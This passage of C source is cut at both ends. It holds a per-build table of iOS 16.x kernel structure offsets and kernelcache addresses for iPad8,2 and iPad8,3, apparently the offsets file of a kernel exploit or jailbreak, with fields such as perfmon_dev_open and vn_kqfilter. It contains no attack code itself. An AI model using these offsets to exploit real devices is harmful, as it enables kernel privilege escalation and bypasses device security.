0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad8,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad8,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a389288, .kernelcache__gPhysBase = 0xfffffff0079340e0, .kernelcache__gPhysSize = 0xfffffff0079340e0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079322b8, .kernelcache__perfmon_devices = 0xfffffff00a3c7500, .kernelcache__perfmon_dev_open = 0xfffffff007eedc8c, .kernelcache__ptov_table = 0xfffffff0078e7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3c6990, .kernelcache__vm_pages = 0xfffffff0078e3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3c6988, .kernelcache__vn_kqfilter = 0xfffffff007f3cad8, }, //16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad8,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a419ab0, .kernelcache__gPhysBase = 0xfffffff007944288, .kernelcache__gPhysSize = 0xfffffff007944288 + 0x8, .kernelcache__gVirtBase = 0xfffffff007942440, .kernelcache__perfmon_devices = 0xfffffff00a459530, .kernelcache__perfmon_dev_open = 0xfffffff007f0a434, .kernelcache__ptov_table = 0xfffffff0078f79a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a458910, .kernelcache__vm_pages = 0xfffffff0078f40f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078f6950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a458908, .kernelcache__vn_kqfilter = 0xfffffff007f58c44, }, // iPad8,3 16.2 { .kern_version = "Darwin Kernel Version 22.1.0: Thu Oct 6 19:33:53 PDT 2022; root:xnu-8792.42.7~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad8,3", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x530, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2a9150, .kernelcache__gPhysBase = 0xfffffff00784f9d8, .kernelcache__gPhysSize = 0xfffffff00784f9d8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784dbc0, .kernelcache__perfmon_devices = 0xfffffff00a2e4300, .kernelcache__perfmon_dev_open = 0xfffffff007ec279c, .kernelcache__ptov_table = 0xfffffff007803890, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2e3780, .kernelcache__vm_pages = 0xfffffff0078006c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007802850, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2e3778, .kernelcache__vn_kqfilter = 0xfffffff007f14d00, }, //16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad8,3", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad8,3", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad8,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad8,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad8,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 